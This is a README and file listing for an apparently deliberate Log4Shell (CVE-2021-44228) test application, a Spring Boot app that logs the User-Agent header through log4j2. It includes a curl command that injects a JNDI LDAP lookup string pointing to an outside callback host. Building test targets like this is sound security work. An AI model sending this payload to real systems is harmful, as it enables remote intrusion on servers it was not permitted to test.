Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)# Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)
* Changed default logging framework from logback to log4j2
Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. [interactsh-service](https://github.com/projectdiscovery/interactsh):
```
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
```
One should see DNS interaction at [app.interactsh.com](https://app.interactsh.com/).
## Docker hub
Link to [Docker hub](https://hub.docker.com/r/korteke/log4shell-demo)
[4.0K] /data/pocs/c7a65cc363db29b92a7c016e28aaae1afef43db1
├── [ 281] Dockerfile
├── [9.6K] mvnw
├── [6.5K] mvnw.cmd
├── [1.6K] pom.xml
├── [ 546] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] net
│ └── [4.0K] kvak
│ └── [4.0K] log4shell
│ ├── [ 322] Log4shellApplication.java
│ └── [ 678] RESTController.java
└── [4.0K] resources
├── [ 44] application.properties
├── [ 643] banner.txt
└── [ 691] log4j2.xml
7 directories, 10 files